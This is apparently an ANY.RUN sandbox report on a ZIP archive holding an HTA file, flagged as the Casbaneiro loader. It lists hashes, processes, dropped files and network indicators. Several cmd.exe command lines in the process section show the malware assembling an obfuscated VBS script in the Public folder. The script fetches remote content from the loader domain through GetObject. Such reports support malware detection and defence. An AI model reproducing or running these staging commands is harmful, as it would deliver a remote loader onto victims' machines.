File name:

❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑦③⑤③③⑧⑨⑥⑥.zip

Full analysis: https://app.any.run/tasks/57780680-0673-4283-9b02-dfbd14013a3f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 21, 2024, 22:18:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
casbaneiro
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

E2C58C594980A65B7E43C2B205FB4BB3

SHA1:

8E6FB537FCEBAE9DB04E74811E1B2C481175DD02

SHA256:

07D9803515F5339F07C8EEAA47663C109CAD3C26AB02511E8089895D5661CB0F

SSDEEP:

6144:aqN08peZOYe+xLLVJOS8uFV7tWb9OSqi0Z7HADpbf1KeqTp4:a2JEO/qV5F/Wb9OSqN7HANbNDqTp4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • CASBANEIRO has been detected

      • cmd.exe (PID: 3204)
      • cmd.exe (PID: 3112)
    • Gets script object from HTTP/HTTPS (SCRIPT)

      • wscript.exe (PID: 2156)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2296)
      • cmd.exe (PID: 3112)
    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 3112)
      • wscript.exe (PID: 2156)
      • cmd.exe (PID: 3204)
      • cmd.exe (PID: 1380)
      • cmd.exe (PID: 660)
      • cmd.exe (PID: 2616)
      • cmd.exe (PID: 1044)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 2296)
      • wscript.exe (PID: 2156)
    • Reads the Internet Settings

      • cmd.exe (PID: 1044)
      • mshta.exe (PID: 2296)
      • wscript.exe (PID: 2156)
    • Application launched itself

      • cmd.exe (PID: 3112)
    • The process executes VB scripts

      • cmd.exe (PID: 1044)
    • Uses TASKKILL.EXE to kill process

      • wscript.exe (PID: 2156)
  • INFO

    • The process uses the downloaded file

      • WinRAR.exe (PID: 1560)
      • cmd.exe (PID: 1044)
      • mshta.exe (PID: 2296)
      • wscript.exe (PID: 2156)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 3160)
      • mshta.exe (PID: 2296)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2296)
    • Checks proxy server information

      • mshta.exe (PID: 2296)
      • wscript.exe (PID: 2156)
    • Checks supported languages

      • wmpnscfg.exe (PID: 3160)
    • Reads the computer name

      • wmpnscfg.exe (PID: 3160)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0002
ZipCompression: Deflated
ZipModifyDate: 2024:11:21 22:05:50
ZipCRC: 0x3024dab6
ZipCompressedSize: 218776
ZipUncompressedSize: 537424
ZipFileName: /\t/bdWxb97/ V9ODPP116MG7ZWBZTPGF7HB
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
13
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs mshta.exe wmpnscfg.exe no specs #CASBANEIRO cmd.exe no specs #CASBANEIRO cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wscript.exe taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
660"C:\Windows\System32\cmd.exe" /V/D/c "echo _>>C:\Users\Public\\scI8A835.vbs&&echo qjI27)>>C:\Users\Public\\scI8A835.vbs"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
980C:\Windows\system32\cmd.exe /S /D /c" echo"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1044"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\\scI8A835.vbsC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1048"C:\Windows\System32\taskkill.exe" /F /IM mshta.exeC:\Windows\System32\taskkill.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
1380C:\Windows\system32\cmd.exe /S /D /c" set /p="qjI27=qjI27 & "oraleslevel"+fp1q5z52+"tech/con/g1":GetO" 1>>C:\Users\Public\\scI8A835.vbs"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1560"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑦③⑤③③⑧⑨⑥⑥.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2156"C:\Windows\System32\WScript.exe" "C:\Users\Public\scI8A835.vbs" C:\Windows\System32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2296"C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑨⑤③⑥①⑤⑦.hta" C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2616C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\scI8A835.vbs"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3004C:\Windows\system32\cmd.exe /S /D /c" echo"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
9 862
Read events
9 736
Write events
110
Delete events
16

Modification events

(PID) Process:(1560) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(1560) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(1560) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1560) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(1560) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(1560) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(1560) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑦③⑤③③⑧⑨⑥⑥.zip
(PID) Process:(1560) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(1560) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(1560) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
0
Suspicious files
5
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
2296mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751der
MD5:822467B728B7A66B081C91795373789A
SHA256:AF2343382B88335EEA72251AD84949E244FF54B6995063E24459A7216E9576B9
2296mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:FF09A92A6B289F7AC485828B9971979D
SHA256:E020655845DA0DA5FC21D5765E89EA83D5353248B75A716227322BC79C6C7F6A
2296mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\14760FA18FA66E42BC03480ECD95E701binary
MD5:CA20E948D63207A2453E7F150BD17490
SHA256:946C4009BA8280DE29586553DBDC70C7373C37231F6FE7D8003B1D61F3A0DE8C
2296mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\14760FA18FA66E42BC03480ECD95E701binary
MD5:DF2A507E391A5612B9FD02E9CD4DF536
SHA256:F64556150F6F19BA24BAE9FC3243E94D6DA5688030D7AB4BEE5970DF7C87CA38
1560WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa1560.34411\❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_⑨⑤③⑥①⑤⑦.htahtml
MD5:EAF63C8044F82563104ADEE93FE575C1
SHA256:1F3E4B476BB828249689FB05010FDB20E77599B4ACEB61AC96014E558191A5D2
3204cmd.exeC:\Users\Public\scI8A835.vbstext
MD5:B8A6D69D1F446C58CF213538E4C7AD91
SHA256:FFC501C3539144128719C8E3FD6F095F62DB3CEA61E2578E73F798F7AD02D8A2
2156wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\g1[1].htmhtml
MD5:845FE3C0E1E0F54D9467DBAB920D7146
SHA256:11104927C2CDD43D72109D0861381EF362AC4191701253395932B064583C4C7F
2296mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\QYTH511[1].jstext
MD5:59669980D3423237C98296D9770D8263
SHA256:AEDF3D88EA2FE1B2C642966C7832340BD853E9677E3C6EAEF04D2A47367DC07E
2156wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\g1[1].txtxml
MD5:3F0E792891BC59443948A37FBC1ED868
SHA256:9AF7BAD9A88311D3467AB52701DDF143E10719BD0F674E01DEC26D4B69EA2E77
2296mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:44A8D70DBAA4F3E1E0E7D4ADDD29E5FE
SHA256:9DAF0530866B62CC7180A36E94021D376353DF52ABA9BF331D2A896DE35CFB17
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
11
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2296
mshta.exe
GET
304
199.232.214.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e6e7f29e1d0501ff
unknown
whitelisted
1108
svchost.exe
GET
304
199.232.210.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?18040dd250b39d5a
unknown
whitelisted
2296
mshta.exe
GET
200
69.192.161.44:80
http://x1.c.lencr.org/
unknown
whitelisted
2296
mshta.exe
GET
200
184.24.77.45:80
http://e5.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQeEcDJrP2kU%2B9LL2pzIRVgTVStuQQUmc0pw6FYJq96ekyEWo9ziGCw394CEgQFACV4Xqd%2FmllhkDs1JPMkYg%3D%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
whitelisted
4
System
192.168.100.255:138
whitelisted
1108
svchost.exe
224.0.0.252:5355
whitelisted
2296
mshta.exe
104.192.42.61:443
oraleslevel.tech
VOICECALL
US
unknown
2296
mshta.exe
199.232.214.172:80
ctldl.windowsupdate.com
FASTLY
US
whitelisted
2296
mshta.exe
69.192.161.44:80
x1.c.lencr.org
AKAMAI-AS
DE
whitelisted
2296
mshta.exe
184.24.77.45:80
e5.o.lencr.org
Akamai International B.V.
DE
whitelisted
2156
wscript.exe
104.192.42.61:443
oraleslevel.tech
VOICECALL
US
unknown
1108
svchost.exe
199.232.210.172:80
ctldl.windowsupdate.com
FASTLY
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.78
whitelisted
oraleslevel.tech
  • 104.192.42.61
unknown
ctldl.windowsupdate.com
  • 199.232.214.172
  • 199.232.210.172
whitelisted
x1.c.lencr.org
  • 69.192.161.44
whitelisted
e5.o.lencr.org
  • 184.24.77.45
  • 184.24.77.53
  • 184.24.77.56
  • 184.24.77.48
  • 184.24.77.79
  • 184.24.77.62
  • 184.24.77.52
  • 184.24.77.57
  • 184.24.77.47
whitelisted

Threats

No threats detected
No debug info